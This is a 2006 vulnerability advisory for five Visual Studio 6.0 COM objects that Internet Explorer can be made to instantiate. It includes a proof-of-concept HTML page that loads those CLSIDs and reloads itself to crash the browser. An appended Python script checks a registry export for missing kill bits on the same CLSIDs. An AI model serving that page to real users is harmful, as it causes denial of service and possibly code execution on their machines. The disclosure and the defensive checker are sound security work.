Advisory ID: XSec-06-07
Advisory Name: Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
Release Date: 08/18/2006
Tested on: Visual Studio 6.0/Internet Explorer 6.0 SP1
Affected version: Visual Studio 6.0
Author: nop <nop#xsec.org>
http://www.xsec.org

Overview:
Multiple vulnerabilities have been found in Visual Studio 6.0.
When Internet Explorer tries to instantiate the TCPROPS.DLL,
FP30WEC.DLL, mdt2db.dll, mdt2qd.dll or VI30AUT.DLL (Visual Studio
6.0) COM object as an ActiveX control, it may corrupt system
memory in such a way that an attacker may cause a DoS and possibly
execute arbitrary code.

Exploit:
=============== vs6.htm start ================
<!--
// Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000/2003
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}
// Info: FpFile Class
// ProgID: WECAPI.FpFile.1
// InprocServer32: C:\WINDOWS\System\FP30WEC.DLL
// CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60}
// Info: TCExtPage Class
// InprocServer32: C:\PROGRA~1\MICROS~1\Common\Tools\TCPROPS.DLL
// CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}
// Info: FpaFile Class
// ProgID: FpaFile.FpaFile.1
// InprocServer32: C:\WINDOWS\system\VI30AUT.DLL
// CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Query Designer
// ProgID: MSDTQueryDesigner2
// InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2qd.dll
// CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Database Designer
// ProgID: MSDTDatabaseDesigner2
// InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2db.dll
--!>
<html><body>
<object classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object>
<object classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object>
<object classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object>
<object classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object>
<object classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object>
<!-- </body>
<script>location.reload();</script>
</html>
=============== vs6.htm end ==================

Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=15

About XSec:
We are redhat.
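
Defensive check, added here as an example (not part of the XSec advisory): Internet Explorer refuses to instantiate a COM object whose kill bit (0x400 in the "Compatibility Flags" DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}) is set. The Python below parses the text of a reg export of that key and reports which of the five CLSIDs listed in the advisory lack it; the function names are hypothetical and the sample export is constructed.

```python
import re

# CLSIDs and DLLs taken from the comment block of the advisory's vs6.htm.
ADVISORY_CLSIDS = {
    "{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}": "FP30WEC.DLL",
    "{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}": "TCPROPS.DLL",
    "{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}": "VI30AUT.DLL",
    "{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}": "mdt2qd.dll",
    "{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}": "mdt2db.dll",
}
KILL_BIT = 0x400  # kill bit inside the "Compatibility Flags" DWORD
KEY_RE = re.compile(r"^\[.*\\ActiveX Compatibility\\(\{[0-9A-Fa-f-]{36}\})\]$")
FLAG_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')

def parse_flags(reg_text):
    """Map CLSID (upper case) -> Compatibility Flags from .reg export text."""
    flags, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = m.group(1).upper() if m else None
        elif current:
            m = FLAG_RE.match(line)
            if m:
                flags[current] = int(m.group(1), 16)
    return flags

def missing_kill_bits(reg_text):
    """Advisory CLSIDs whose key is absent or whose kill bit is not set."""
    flags = parse_flags(reg_text)
    return sorted(c for c in ADVISORY_CLSIDS if not flags.get(c, 0) & KILL_BIT)

# Constructed sample: two CLSIDs killed, one present without the bit, two absent.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{ab39f080-0f5d-11d1-8e2f-00c04fb68d60}]
"Compatibility Flags"=dword:00800400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}]
"Compatibility Flags"=dword:00000020
"""

if __name__ == "__main__":
    for clsid in missing_kill_bits(SAMPLE_EXPORT):
        print("kill bit NOT set:", clsid, ADVISORY_CLSIDS[clsid])
```

Files written by reg export are normally UTF-16, so decode them to text before passing them to missing_kill_bits().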